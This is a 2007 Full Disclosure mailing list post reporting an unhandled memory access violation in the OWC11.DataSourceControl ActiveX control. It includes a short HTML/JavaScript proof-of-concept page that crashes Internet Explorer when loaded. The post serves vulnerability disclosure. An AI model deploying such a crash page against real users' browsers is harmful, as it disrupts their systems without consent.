Full Disclosure mailing list archives
Office Web Controls DataSourceControl Memory Access Violation
From: Elazar Broad <elazarb () earthlink net>
Date: Sun, 11 Nov 2007 01:01:04 -0500 (GMT-05:00)
There is an un-handled memory access violation in the OWC11.DataSourceControl. As far as I know, I don't think it is possible to execute code via this, the worst it can do is crash Internet Explorer. PoC as follows: ------------------ <!-- written by e.b. --> <html> <head> <script language="JavaScript" DEFER> function Check() { var obj = new ActiveXObject("OWC11.DataSourceControl"); obj.XMLDataTarget = "A"; } </script> </head> <body onload="JavaScript: return Check();" /> </html> ------------------ Elazar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Office Web Controls DataSourceControl Memory Access Violation Elazar Broad (Nov 12)